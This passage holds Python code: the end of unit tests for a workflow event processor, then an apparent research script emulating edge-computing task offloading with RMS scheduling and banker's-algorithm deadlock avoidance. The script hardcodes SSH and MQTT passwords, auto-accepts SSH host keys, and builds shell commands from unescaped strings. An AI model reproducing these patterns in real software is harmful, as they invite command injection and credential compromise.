self.mock_store.get_workflow_context_event_handler_state.return_value = None
self.mock_store.register_workflow_context_event_handler_state.return_value = state
context_list = ContextList()
context_list.add_context('context_1')
states = self.processor._get_workflow_execution_state(context_list, 'project', 'workflow1')
self.assertEqual(1, len(states))
self.assertEqual(state, states[0])
self.mock_store.register_workflow_context_event_handler_state.assert_called_with('project', 'workflow1',
'context_1')
def test__get_workflow_execution_state_with_context(self):
state = WorkflowContextEventHandlerState('project', 'workflow1', 'context_1')
self.mock_store.get_workflow_context_event_handler_state.return_value = state
context_list = ContextList()
context_list.add_context('context_1')
context_list.add_context('context_2')
states = self.processor._get_workflow_execution_state(context_list, 'project', 'workflow1')
calls = [mock.call('project', 'workflow1', 'context_1'), mock.call('project', 'workflow1', 'context_2')]
self.mock_store.get_workflow_context_event_handler_state.assert_has_calls(calls, any_order=True)
self.assertEqual(2, len(states))
def test__get_workflow_execution_state_with_broadcast(self):
state = WorkflowContextEventHandlerState('project', 'workflow1', 'context_1')
self.mock_store.list_workflow_context_event_handler_states.return_value = [state]
states = self.processor._get_workflow_execution_state(Broadcast(), 'project', 'workflow1')
self.mock_store.list_workflow_context_event_handler_states.assert_called_with('project', 'workflow1')
self.assertEqual(1, len(states))
self.assertEqual(state, states[0])
def test__handler_event_for_workflow_none_action(self):
context_extractor = MyContextExtractor()
rule = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k', 'v', namespace='test_namespace'),
WorkflowAction.START)
rule1 = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k1', 'v1', namespace='test_namespace'),
WorkflowAction.START)
w1 = WorkflowMeta('workflow1', 0, context_extractor_in_bytes=cloudpickle.dumps(context_extractor),
scheduling_rules=[rule, rule1])
state = WorkflowContextEventHandlerState('project', 'workflow1', 'context_1')
self.mock_store.get_workflow_context_event_handler_state.return_value = state
self.mock_event_handler.handle_event.return_value = (WorkflowAction.NONE, 1)
e = BaseEvent('k1', 'v1', namespace='test_namespace')
self.processor._handle_event_for_workflow('project', w1, e)
self.mock_store.update_workflow_context_event_handler_state \
.assert_called_with('project', 'workflow1', 'context_1', None, 1)
def test__handler_event_for_workflow_start_action(self):
context_extractor = MyContextExtractor()
rule = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k', 'v', namespace='test_namespace'),
WorkflowAction.START)
rule1 = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k1', 'v1', namespace='test_namespace'),
WorkflowAction.START)
w1 = WorkflowMeta('workflow1', 0, context_extractor_in_bytes=cloudpickle.dumps(context_extractor),
scheduling_rules=[rule, rule1])
state = WorkflowContextEventHandlerState('project', 'workflow1', 'context_1')
self.mock_store.get_workflow_context_event_handler_state.return_value = state
# Start Action
self.mock_scheduler.start_new_workflow_execution.return_value = WorkflowExecutionInfo('execution_id')
self.mock_event_handler.handle_event.return_value = (WorkflowAction.START, 1)
e = BaseEvent('k1', 'v1', namespace='test_namespace')
self.processor._handle_event_for_workflow('project', w1, e)
self.mock_scheduler.start_new_workflow_execution.assert_called_with('project', 'workflow1', 'context_1')
self.mock_store.update_workflow_context_event_handler_state \
.assert_called_with('project', 'workflow1', 'context_1', 'execution_id', 1)
def test__handler_event_for_workflow_start_with_running_workflow_execution(self):
context_extractor = MyContextExtractor()
rule = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k', 'v', namespace='test_namespace'),
WorkflowAction.START)
rule1 = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k1', 'v1', namespace='test_namespace'),
WorkflowAction.START)
w1 = WorkflowMeta('workflow1', 0, context_extractor_in_bytes=cloudpickle.dumps(context_extractor),
scheduling_rules=[rule, rule1])
state = WorkflowContextEventHandlerState('project', 'workflow1', 'context_1', '1')
self.mock_store.get_workflow_context_event_handler_state.return_value = state
# Start Action
self.mock_scheduler.get_workflow_execution.return_value = WorkflowExecutionInfo('1', status=Status.RUNNING)
self.mock_event_handler.handle_event.return_value = (WorkflowAction.START, 1)
e = BaseEvent('k1', 'v1', namespace='test_namespace')
self.processor._handle_event_for_workflow('project', w1, e)
self.mock_scheduler.start_new_workflow_execution.assert_not_called()
self.mock_store.update_workflow_context_event_handler_state \
.assert_called_with('project', 'workflow1', 'context_1', '1', 1)
def test__handler_event_for_workflow_start_with_non_running_workflow_execution(self):
context_extractor = MyContextExtractor()
rule = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k', 'v', namespace='test_namespace'),
WorkflowAction.START)
rule1 = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k1', 'v1', namespace='test_namespace'),
WorkflowAction.START)
w1 = WorkflowMeta('workflow1', 0, context_extractor_in_bytes=cloudpickle.dumps(context_extractor),
scheduling_rules=[rule, rule1])
state = WorkflowContextEventHandlerState('project', 'workflow1', 'context_1', '1')
self.mock_store.get_workflow_context_event_handler_state.return_value = state
# Start Action
self.mock_scheduler.get_workflow_execution.return_value = WorkflowExecutionInfo('1', status=Status.FINISHED)
self.mock_scheduler.start_new_workflow_execution.return_value = WorkflowExecutionInfo('execution_id')
self.mock_event_handler.handle_event.return_value = (WorkflowAction.START, 1)
e = BaseEvent('k1', 'v1', namespace='test_namespace')
self.processor._handle_event_for_workflow('project', w1, e)
self.mock_scheduler.start_new_workflow_execution.assert_called_with('project', 'workflow1', 'context_1')
self.mock_store.update_workflow_context_event_handler_state \
.assert_called_with('project', 'workflow1', 'context_1', 'execution_id', 1)
def test__handler_event_for_workflow_stop_action(self):
context_extractor = MyContextExtractor()
rule = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k', 'v', namespace='test_namespace'),
WorkflowAction.START)
rule1 = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k1', 'v1', namespace='test_namespace'),
WorkflowAction.START)
w1 = WorkflowMeta('workflow1', 0, context_extractor_in_bytes=cloudpickle.dumps(context_extractor),
scheduling_rules=[rule, rule1])
state = WorkflowContextEventHandlerState('project', 'workflow1', 'context_1')
self.mock_store.get_workflow_context_event_handler_state.return_value = state
self.mock_event_handler.handle_event.return_value = (WorkflowAction.STOP, 1)
e = BaseEvent('k1', 'v1', namespace='test_namespace')
self.processor._handle_event_for_workflow('project', w1, e)
self.mock_store.update_workflow_context_event_handler_state \
.assert_called_with('project', 'workflow1', 'context_1', None, 1)
state.workflow_execution_id = 'execution_id'
self.processor._handle_event_for_workflow('project', w1, e)
self.mock_scheduler.stop_workflow_execution.assert_called_with('execution_id')
self.mock_store.update_workflow_context_event_handler_state \
.assert_called_with('project', 'workflow1', 'context_1', 'execution_id', 1)
def test__handler_event_for_workflow_exception(self):
context_extractor = MyContextExtractor()
rule = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k', 'v', namespace='test_namespace'),
WorkflowAction.START)
rule1 = WorkflowSchedulingRule(MeetAllEventCondition().add_event('k1', 'v1', namespace='test_namespace'),
WorkflowAction.START)
w1 = WorkflowMeta('workflow1', 0, context_extractor_in_bytes=cloudpickle.dumps(context_extractor),
scheduling_rules=[rule, rule1])
state = WorkflowContextEventHandlerState('project', 'workflow1', 'context_1')
self.mock_store.get_workflow_context_event_handler_state.return_value = state
# Start Action
e = BaseEvent('k1', 'v1', namespace='test_namespace', event_type='exception')
self.processor._handle_event_for_workflow('project', w1, e)
|
algo_one.py
|
from functools import reduce
from sys import *
import numpy as np
import random as r
import socket
import struct
import subprocess as sp
import threading
from threading import Thread
import ast
import time
import datetime as dt
import os
import psutil
from netifaces import interfaces, ifaddresses, AF_INET
import paho.mqtt.client as mqtt
import smtplib
import config
import paramiko
import argparse
import pickle
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
outward_mec = 0 # keeps count of tasks sent back to another mec after executing
deadlock = [1] # keeps count of how many deadlock is resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}] # [[task_list],{wait_time}] => records that’s re-offloaded to mec to execute.
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_time = []
_port_ = 64000
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
shared_resource_lock = threading.Lock()
t_track = 1
task_record = {} # keeps record of task reoffloaded
task_id = 0 # id for each task reoffloaded
def ping(host):
cmd = [f'ping -c 1 {host}']
output = str(sp.check_output(cmd, shell=True), 'utf-8').split('\n')
try:
value = float(output[-2].split('=')[-1].split('/')[0])
except ValueError:
value = None
return value
def discovering_group():
global sock1
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock1.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def offloading_group():
global sock2
multicast_group = '224.5.5.55'
server_address = ('', 20000)
# Create the socket
sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock2.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def ip_address():
try:
cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
if len(address.strip().split('.')) == 4:
return address.strip()
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception as e:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def _memory():
global memory
memory.append(round(my_algo.memory_percent(), 4))
def m_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(round(delta, 4))
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def generate_results():
_memory()
m_cpu()
get_mec_rtts()
def host_ip_set():
global ip_set
ip_set = set()
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
ip_set.add(', '.join(addresses))
def get_time():
_time_ = []
d = str(dt.datetime.utcnow()).split()
_time_ += d[0].split('-')
g = d[1].split('.')
_time_ += g[0].split(':')
try:
_time_.append(g[1])
except IndexError:
_time_.append('0')
return _time_
def get_rtt(host):
rtt = ping(host)
if rtt:
return round(rtt, 4)
else:
return get_rtt(host)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(node_id, )
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
global run
data = str(msg.payload, 'utf-8')
if data[0] == 'c': # receive from cloud
received_task = data[2:]
# send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
if received_task in task_record:
del task_record[received_task]
received_task = '.'.join(received_task.split('.')[:-1])
_client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time() + ['cloud']}), )
cooperate['cloud'] += 1
count_task_sent(received_task)
elif data[0] == 't': # receive from client
received_task = ast.literal_eval(data[2:])
received_task_queue.append(received_task)
received_time.append(time.time())
elif data.strip() == 'stop': # stop {hostname: ip}
print('sending stop alert')
run = 0
def connect_to_broker(stop):
global _client
username = 'mec'
password = 'password'
broker_port_no = 1883
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_start()
while True:
if stop():
_client.loop_stop()
_client.disconnect()
print('broker loop terminated')
break
def task_time_map(seq, process):
exe_seq = []
capacity_sum = 0
for job in process:
capacity_sum += process[job]['wcet']
while capacity_sum > 0:
for job in seq:
if process[job]['wcet'] > 0:
exe_seq.append(job)
process[job]['wcet'] -= 1
capacity_sum -= 1
return exe_seq
def load_tasks():
period_list = [tasks[i]['period'] for i in tasks]
lcm_period = lcm(period_list)
# insert idle task
s_task = {**tasks, 'idle': {'wcet': lcm_period, 'period': lcm_period + 1}}
return lcm_period, s_task
total_received_task = 0
def scheduler(_lcm_, s_tasks): # RMS algorithm
global total_received_task
queue = list(s_tasks.keys()) # initialize task queue
schedule = []
rms = []
curr = '' # current task
prev = '' # previous task
tmp = {}
for task in s_tasks.keys():
tmp[task] = {} # temporary data for each task
tmp[task]['deadline'] = s_tasks[task]['period']
tmp[task]['executed'] = 0
# start scheduling...
# proceed by one timestamp to handle preemption
for _time_ in range(_lcm_):
# insert new tasks into the queue
for t in tmp.keys():
if _time_ == tmp[t]['deadline']:
if s_tasks[t]['wcet'] > tmp[t]['executed']:
# print('Scheduling Failed at %d' % time)
exit(1)
else:
tmp[t]['deadline'] += s_tasks[t]['period']
tmp[t]['executed'] = 0
queue.append(t)
# select next task to be scheduled
_min_ = _lcm_ * 2
for task in queue:
if tmp[task]['deadline'] < _min_:
_min_ = tmp[task]['deadline']
curr = task
tmp[curr]['executed'] += 1
# print(time, queue, curr)
# dequeue the execution-completed task
if tmp[curr]['executed'] == s_tasks[curr]['wcet']:
for i in range(len(queue)):
if curr == queue[i]:
del queue[i]
break
# record to the schedule trace
if prev != curr:
if prev in queue and prev != 'idle': # previous task is preempted..
s = schedule.pop()
schedule.append([s[0], s[1], '*'])
rms.append(s[1])
schedule.append([_time_, curr])
if curr != 'idle':
rms.append(curr)
prev = curr
process = {task: {'wcet': tasks[task]['wcet']} for task in tasks}
rms = task_time_map(seq=rms, process=process)
total_received_task += len(rms)
return rms
# generate execution sequence
def is_safe(processes, avail, _need_, allot, p): # bankers algorithm
need = [_need_[i] for i in _need_]
_allot_ = [allot[i] for i in allot]
# tasks to offload if exit
offload = []
# Number of resources
res = 3
# Mark all processes as unfinished
finish = [0] * p
# To store safe sequence
safe_seq = [0] * p
# Make a copy of available resources
work = [0] * res
for i in range(res):
work[i] = avail[i]
# While all processes are not finished
# or system is not in safe state.
count = 0
while count < p:
# Find a process which is not finish
# and whose needs can be satisfied
# with current work[] resources.
found = False
for t in range(p):
# First check if a process is finished,
# if no, go for next condition
if finish[t] == 0:
# Check if for all resources
# of current P need is less
# than work
for j in range(res):
if need[t][j] > work[j]:
break
# If all needs of p were satisfied.
if j == res - 1:
# Add the allocated resources of
# current P to the available/work
# resources i.e.free the resources
for k in range(res):
work[k] += _allot_[t][k]
# Add this process to safe sequence.
safe_seq[count] = processes[t]
count += 1
# Mark this p as finished
finish[t] = 1
found = True
# If we could not find a next process
# in safe sequence.
if not found:
print("System is not in safe state")
a = list(set(processes) - set(safe_seq) - set(offload))
_max = np.array([0, 0, 0])
n = {}
for i in a:
n[i] = sum(allocation[i[:2]])
_max = max(n, key=n.get)
print('work: ', work, 'need: ', _need[_max[:2]])
offload.append(_max)
work = np.array(work) + np.array(allocation[_max[:2]])
count += 1
# Mark this p as finished
finish[processes.index(_max)] = 1
found = True
# If system is in safe state then
# safe sequence will be as below
if len(offload) > 0:
safe_seq = safe_seq[:safe_seq.index(0)]
print('offloading tasks: ', offload)
cooperative_mec(offload)
deadlock[0] += 1
print("System is in safe state.",
"\nSafe sequence is: ", end=" ")
print('safe seq: ', safe_seq)
return safe_seq
def get_exec_seq(pro):
# Number of processes
p = len(pro)
processes = ['{}_{}'.format(pro[i], i) for i in range(len(pro))]
# Available instances of resources
avail = [6, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return is_safe(processes, avail, n_need, allot, p)
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = i.split('_')[0]
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
# waiting time = total waiting time ÷ 2 average waiting time might be too tight
w_send = round(time_dic[list(time_dic.keys())[-1]] / 2, 3)
send_message('wt {} {}'.format(ip_address(), str(w_send))) # Broadcasting waiting time to cooperative MECs
return time_dic
timed_out_tasks = 0
def compare_local_mec(list_seq):
global received_time, timed_out_tasks
execute_mec = []
execute_locally = []
diff = time.time() - received_time.pop(0)
checking_times = {}
for i in list_seq:
t_time[i.split('_')[0]][1] -= diff
# if t_time[i.split('_')[0]][1] < 0:
# _client.publish(i.split('_')[0].split('.')[2], str({i.split('_')[0]: get_time() + ['local']}), )
# timed_out_tasks += 1
if t_time[i.split('_')[0]][1] > list_seq[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
checking_times[i] = {'Latency': t_time[i.split('_')[0]][1], 'Expected_exec_time': list_seq[i]}
print('Execution time comparison:= ', checking_times)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return round(avg1, 4)
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + str([get_hostname(), ip_address()])
sock1.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
else:
sock1.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message(stop): # used for multi-cast message exchange among MEC
global hosts
while True:
if stop():
print('Stopped: receive_message()')
break
else:
data, address = sock1.recvfrom(1024)
_d = data.decode()
if _d[:5] == 'hello':
_data = ast.literal_eval(_d[6:])
hosts[_data[0]] = _data[1]
# print('received: ', hosts)
if _data[1] != host_ip:
mec_rtt[_data[1]] = []
elif (_d[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(_d[7:])
# print('received: ', hosts)
for i in hosts:
if i != host_ip:
mec_rtt[i] = []
elif _d[:2] == 'wt':
split_data = _d.split()
if split_data[1] != host_ip:
w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
address[0])) # calcuate moving average of mec wait time => w_time = wait time + rtt
if split_data[1] in mec_waiting_time:
mec_waiting_time[split_data[1]].append(w_time)
else:
mec_waiting_time[split_data[1]] = [w_time]
def mec_comparison():
# returns min average waiting for all mecs
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def cooperative_mec(mec_list):
global _off_cloud
global _off_mec
global task_id, task_record
for i in mec_list:
_host = mec_comparison()
if _host == 0:
# send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time]
_send_task = f"{i.split('_')[0]}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = i.split('_')[0]
_max = np.array([6, 5, 5])
send = 'false'
if not (False in list(np.greater_equal(_max, _need[j[:2]]))):
send = 'true'
# CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)):
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
_send_task = f"{j}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[j][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# send_cloud([j, t_time[j][0]]) # # [task_id,exec_time]
# cloud_register[j.split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
offload_check = [0, 0]
def execute_re_offloaded_task(offloaded_task):
global outward_mec, offload_check
exec_list = get_exec_seq(offloaded_task[0])
# if len(exec_list) != len(offloaded_task[0]):
# print('\n\n', '@ ' * 50)
# print('exec: ', exec_list, 'off: ', offloaded_task[0])
# print('\n\n', '@ ' * 50)
# offload_check.append((exec_list, offloaded_task[0]))
outward_mec += len(exec_list)
for i in offloaded_task[0]: # i = 't1.1.2.3*1_3'
j = i.split('_')[0]
time.sleep(offloaded_task[1][j] / 2)
# print('j task: ', j)
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
clients_record = {}
def count_task_sent(task):
global clients_record
c_id = task.split('.')[2]
if c_id in clients_record:
clients_record[c_id] += 1
else:
clients_record[c_id] = 1
def execute(local):
print('\nExecuting :', local)
for i in local:
j = i.split('_')[0]
_t = t_time[j][0] / 2
time.sleep(_t)
print('#{}'.format(local.index(i) + 1), ' Executed: ', i)
_client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
count_task_sent(j)
# if j.split('.')[1] != node_id:
# send_offloaded_task_mec('{} {}'.format(j.split('.')[1], j))
# outward_mec += 1
# elif j.split('.')[1] == node_id:
# # send_client({j: get_time()}, send_back_host)
# _client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
# count_task_sent(j)
# else:
# print('else execute: ', j)
print('============== EXECUTION DONE ===============')
cooperate = {'mec': 0, 'cloud': 0}
def receive_offloaded_task_mec(stop): # run as a thread
global _inward_mec
global t_track
while True:
if stop():
print('Stopped: receive_offloaded_task_mec()')
break
else:
data, address = sock2.recvfrom(1024)
if len(data.decode()) > 0:
da = data.decode().split(' ')
if (address[0] not in ip_set) and (da[0] == node_id): # send back to client
# send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client
if da[1] in task_record:
del task_record[da[1]]
task_new = '.'.join(da[1].split('.')[:-1])
_client.publish(da[1].split('.')[2], str({task_new: get_time() + ['mec']}), )
count_task_sent(da[1])
cooperate['mec'] += 1
else:
print('*' * 30 + f'\n{da[1]} Not in Task Record\n' + '*' * 30)
elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id):
_received = ast.literal_eval(da[2] + da[3])
shared_resource_lock.acquire()
task = _received[0] + '*{}'.format(t_track)
reoffload_list[0].append(task)
reoffload_list[1][task] = _received[1]
shared_resource_lock.release()
t_track += 1
_inward_mec += 1
def call_execute_re_offload(stop):
global reoffload_list, outward_mec
global offload_check
while True:
if stop():
print('Stopped: call_execute_re_offload()')
break
else:
if len(reoffload_list[0]) == 1:
t = reoffload_list[0][-1]
time.sleep(reoffload_list[1][t] / 2)
shared_resource_lock.acquire()
reoffload_list[0].remove(t)
del reoffload_list[1][t]
shared_resource_lock.release()
send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
offload_check[0] += 1
outward_mec += 1
elif len(reoffload_list[0]) > 1:
o = reoffload_list.copy()
offload_check[1] += len(o)
execute_re_offloaded_task(o)
for i in o[0]:
shared_resource_lock.acquire()
reoffload_list[0].remove(i)
del reoffload_list[1][i]
shared_resource_lock.release()
def send_email(msg, send_path):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results rms+bankers {} {}'.format(get_hostname(), send_path)
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def send_offloaded_task_mec(msg):
_multicast_group = ('224.5.5.55', 20000)
try:
sock2.sendto(str.encode(msg), _multicast_group)
except Exception as e:
print(e)
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
c.close()
except Exception as e:
print(e)
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
def save_and_send(send_path):
_id_ = get_hostname()[-1]
result = f"\nwt{_id_}_2_{mec_no} = {mec_waiting_time} " \
f"\nrtt{_id_}_2_{mec_no} = {mec_rtt} \ncpu{_id_}_2_{mec_no} = {_cpu} " \
f"\noff_mec{_id_}_2_{mec_no} = {_off_mec} " \
f"\noff_cloud{_id_}_2_{mec_no} = {_off_cloud} " \
f"\ninward_mec{_id_}_2_{mec_no} = {_inward_mec}" \
f"\nloc{_id_}_2_{mec_no} = {_loc} " \
f"\ndeadlock{_id_}_2_{mec_no} = {deadlock} \nmemory{_id_}_2_{mec_no} = {memory}" \
f"\ntask_received{_id_}_2_{mec_no} = {total_received_task} \nsent_t{_id_}_2_{mec_no} = {clients_record}" \
f"\ncooperate{_id_}_2_{mec_no} = {cooperate} \ntask_record{_id_}_2_{mec_no} = {task_record}" \
f"\noutward_mec{_id_}_2_{mec_no} = {outward_mec}" \
f"\noffload_check{_id_}_2_{mec_no} = {offload_check}\n" \
f"\ntimed_out_tasks{_id_}_2_{mec_no} = {timed_out_tasks}\n"
list_result = [
f"\nwt{_id_}_2_{mec_no} = {mec_waiting_time} ",
f"\nrtt{_id_}_2_{mec_no} = {mec_rtt} \ncpu{_id_}_2_{mec_no} = {_cpu} ",
f"\noff_mec{_id_}_2_{mec_no} = {_off_mec} \noff_cloud{_id_}_2_{mec_no} = {_off_cloud} ",
f"\ninward_mec{_id_}_2_{mec_no} = {_inward_mec}",
f"\nloc{_id_}_2_{mec_no} = {_loc} ",
f"\ndeadlock{_id_}_2_{mec_no} = {deadlock} \nmemory{_id_}_2_{mec_no} = {memory}",
f"\ntask_received{_id_}_2_{mec_no} = {total_received_task} \nsent_t{_id_}_2_{mec_no} = {clients_record}",
f"\ncooperate{_id_}_2_{mec_no} = {cooperate} \ntask_record{_id_}_2_{mec_no} = {task_record} "
f"\noutward_mec{_id_}_2_{mec_no} = {outward_mec}",
f"\noffload_check{_id_}_2_{mec_no} = {offload_check}"
f"\ntimed_out_tasks{_id_}_2_{mec_no} = {timed_out_tasks}"
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datap.py"
os.system(cmd)
else:
os.system(f'mkdir -p {path_}')
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_2_{mec_no}datap.py"
os.system(cmd)
file_ = open(f'{path_}{_id_}_2_{mec_no}datap.py', 'w')
for i in list_result:
cmd = f'echo "{i}" >> {path_}{_id_}_2_{mec_no}datal.py'
file_.write(i)
os.system(cmd)
file_.close()
sp.run(
["scp", f"{path_}{_id_}_2_{mec_no}datap.py", f"mec@{hosts['osboxes-0']}:{send_path}"])
send_result(hosts['osboxes-0'], list_result)
send_email(result, send_path)
if len(task_record) > 0:
for _task_ in task_record:
task_new = '.'.join(_task_.split('.')[:-1])
_client.publish(task_new.split('.')[2], str({task_new: get_time() + [task_record[_task_]]}), )
def start_loop():
global _loc
global tasks
global t_time
global node_id
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
node_id = mec_id(ip_address())
# print('node id: ', node_id)
func_to_thread = [receive_message, receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
threads_ = []
stop = False
for i in func_to_thread:
threads_.append(Thread(target=i, args=(lambda: stop,)))
threads_[-1].daemon = True
